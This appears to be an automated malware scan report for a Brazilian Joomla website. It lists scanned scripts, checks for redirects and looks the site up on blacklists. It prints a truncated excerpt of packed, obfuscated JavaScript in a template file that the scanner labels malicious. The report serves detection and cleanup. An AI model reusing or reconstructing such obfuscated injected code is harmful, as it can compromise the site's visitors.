Scanned pages/files
Request | Server response | Status |
http://ekosamazonia.com.br/ | 200 OK Content-Length: 49316 Content-Type: text/html | clean |
http://maps.google.com/maps/api/js?v=3.x&language=pt-BR&libraries=places&sensor=false | 200 OK Content-Length: 4531 Content-Type: text/javascript | clean |
http://ekosamazonia.com.br/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/plugins/system/rokbox/assets/js/rokbox.js | 200 OK Content-Length: 55151 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/templates/rt_hybrid/js/gantry-slidingpanel.js | 200 OK Content-Length: 1847 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(f(){2.H=8 I({J:[K,L],3:{p:M,q:\'N\',h:r.O.P.Q,i:\'R-S\',s:0,9:[\'T\',\'U\']},V:f(a,b){t c=a;a=W.j(a)||X;6(!a)Y;6(!a)k 8 l(\'"\'+c+\'" Z 10 11. :(\');2.12=a;2.4=a.g(\'# Antivirus reports:
| ||
http://ekosamazonia.com.br/libraries/gantry/js/gantry-morearticles.js | 200 OK Content-Length: 1883 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/libraries/gantry/js/gantry-smartload.js | 200 OK Content-Length: 2815 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/libraries/gantry/js/gantry-buildspans.js | 200 OK Content-Length: 698 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/libraries/gantry/js/gantry-inputs.js | 200 OK Content-Length: 3880 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/libraries/gantry/js/browser-engines.js | 200 OK Content-Length: 4026 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/modules/mod_roknavmenu/themes/fusion/js/fusion.js | 200 OK Content-Length: 26565 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/plugins/content/jdownloads/jdownloads/lightbox/lightbox.js | 200 OK Content-Length: 12325 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ekosamazonia.com.br
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 26 Mar 2015 10:28:28 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: aaa256fe7a3f295408c6ae78efdd5302=7eabb5fe079c203a7be403de3c4fd281; path=/
GET / HTTP/1.1
Host: ekosamazonia.com.br
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 26 Mar 2015 10:28:28 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: aaa256fe7a3f295408c6ae78efdd5302=7eabb5fe079c203a7be403de3c4fd281; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: ekosamazonia.com.br
Referer: http://www.google.com/search?q=ekosamazonia.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ekosamazonia.com.br
Referer: http://www.google.com/search?q=ekosamazonia.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ekosamazonia.com.br
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ekosamazonia.com.br/
Result: ekosamazonia.com.br is not infected or malware details are not published yet.
Result: ekosamazonia.com.br is not infected or malware details are not published yet.